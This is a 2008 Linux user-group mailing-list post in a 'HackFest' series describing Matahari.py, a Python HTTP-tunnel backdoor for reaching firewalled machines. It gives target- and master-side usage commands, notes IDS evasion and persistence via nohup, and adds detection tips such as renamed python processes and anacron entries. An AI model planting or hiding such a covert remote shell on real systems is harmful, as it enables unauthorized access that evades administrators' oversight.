HackFest Series: Matahari.py HTTP Tunnel - Firewall Traversal
Lisa Kachold
lisakachold at obnosis.com
Wed Oct 22 21:51:04 MST 2008
Matahari
matahari is a python script
designed to provide a basic non-interactive shell on remote systems behind
firewalls. It is intended for use by system administrators who may need some
emergency backdoor to access a firewalled machine.
Once you set up the script on the target
machine (namely, the client) it begins trying to retrieve commands from the
master machine (the server). The time between periodic requests (polls) can
be configured to suit different needs ranging from low latency (frequent
polls) to stealthier behaviors.
All traffic between target and master
machine is made through HTTP GET/POST requests and their corresponding
responses, traversing firewall as standard outgoing web traffic. Optional
IDS-evasion techniques can be used in special scenarios where backdoor should
remain totally undetected by firewall administrators.
Matahari.py's HTTP port is configurable; SNORT and many IDS do not intercept matahari packets.
The script must be setup on both sides and is available on Backtrack (KDE --> Maintaining Access --> BackDoors and Rootkits) or via a quick wget (for the other side) from here:
http://sourceforge.net/project/showfiles.php?group_id=206888&package_id=247564&release_id=547359
Suspect your server has been encroached? Watch for rogue python processes (renamed to something that SOUNDS perfectly believable like "updatd") and/or matahari running from anacron (which is often left enabled yet ignored) that opens scheduled tunnel access.
It's also exceptional as an administrative security honeypot tool to watch an encroached server for information gathering purposes without the script kiddies catching on, should you not want to possibly expose a logserver.
Usage:
Suppose you have a target machine (target.foo.com) behind a firewall and
you want to be able to execute commands from a master machine
(master.bar.com). The scenario could be set up as follows:
Exec on target machine:
./matahari.py -c
master.bar.com -T polite.
Be sure to keep process running even after logging off (nohup and
screen
are your friends)
Exec anytime on master machine:
./matahari.py -s
target.foo.com
Reference: http://matahari.sourceforce.net
http://wapedia.mobi/en/Obnosis | http://en.wiktionary.org/wiki/Citations:obnosis | Obnosis.com (503)754-4452
Laugh at this MSN Footer
_________________________________________________________________
When your life is on the go—take your life with you.
http://clk.atdmt.com/MRT/go/115298558/direct/01/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20081023/94d53576/attachment.htm
More information about the PLUG-discuss
mailing list